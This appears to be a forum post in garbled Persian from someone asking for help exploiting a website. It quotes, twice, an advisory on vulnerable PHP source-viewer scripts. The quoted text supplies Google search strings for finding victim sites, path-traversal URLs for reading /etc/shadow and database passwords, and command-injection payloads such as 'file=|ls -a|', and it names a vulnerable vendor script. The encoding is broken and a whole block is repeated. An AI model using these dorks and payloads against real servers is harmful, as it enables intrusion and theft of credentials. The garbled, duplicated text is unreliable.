سلام به دوستان من توي يه سايت در مورد آسيب پذيري زير مطالعه كردم ولي در عمل نميشه ازش استÙاده كرد ...يه راهنمايي كنيد
من وقتي اسم سايت را مزنم بعد ls -a Ùقط يه صÙØÙ‡ سÙيد ميبينم
Google Hack: PHP Source Viewer/Editor
Command Execution, Disclosure
From : http://kapda.ir/advisory-240.html
-------
Risk: High
Vulnerabilities: Remote Command Execution / Source Code Disclosure
Advisory:
---------
Many admins create/modify pages directly on there servers with the use of another php page.
They either write those ******s themselves or use pre-build scipts.
Just search in google for something like
"PHP Source Viewer" source.php
"Source viewer" .php
"Viewer" file= .php
...
or something similar.
and google will return with many results like
Code:
http://victim/source.php?file=somepage.php
http://victim/source.php?url=somepage.php
http://victim/source.php?open=../../etc/ shadow !!!
http://victim/source_viewer.php
...
If you just modify the url, you can read any php ****** (or other files like etc/shadow) on that site.
Including off course the index pages and the pages with mysql database usernames and passwords
which could lead to further attacks and possible complete compromise of the server.
Of course many of those ******s are so poorely written and so it's easy to find a remote command execution bug.
---------------------------------------
http://victim/somepage.cgi?file=|ls -a|,
http://victim/somepage.php?file=;ls%20-a
...)
----------------------------------
Many PHP builder ******s exist on the internet.
Here is an exemple vendor who offers vulnerable ******s
PHP source viewer from http://www.cgixp.tk/
Google search string: "Powered By: PHP Source Viewer"
من وقتي اسم سايت را مزنم بعد ls -a Ùقط يه صÙØÙ‡ سÙيد ميبينم
Google Hack: PHP Source Viewer/Editor
Command Execution, Disclosure
From : http://kapda.ir/advisory-240.html
-------
Risk: High
Vulnerabilities: Remote Command Execution / Source Code Disclosure
Advisory:
---------
Many admins create/modify pages directly on there servers with the use of another php page.
They either write those ******s themselves or use pre-build scipts.
Just search in google for something like
"PHP Source Viewer" source.php
"Source viewer" .php
"Viewer" file= .php
...
or something similar.
and google will return with many results like
Code:
http://victim/source.php?file=somepage.php
http://victim/source.php?url=somepage.php
http://victim/source.php?open=../../etc/ shadow !!!
http://victim/source_viewer.php
...
If you just modify the url, you can read any php ****** (or other files like etc/shadow) on that site.
Including off course the index pages and the pages with mysql database usernames and passwords
which could lead to further attacks and possible complete compromise of the server.
Of course many of those ******s are so poorely written and so it's easy to find a remote command execution bug.
---------------------------------------
http://victim/somepage.cgi?file=|ls -a|,
http://victim/somepage.php?file=;ls%20-a
...)
----------------------------------
Many PHP builder ******s exist on the internet.
Here is an exemple vendor who offers vulnerable ******s
PHP source viewer from http://www.cgixp.tk/
Google search string: "Powered By: PHP Source Viewer"
Comment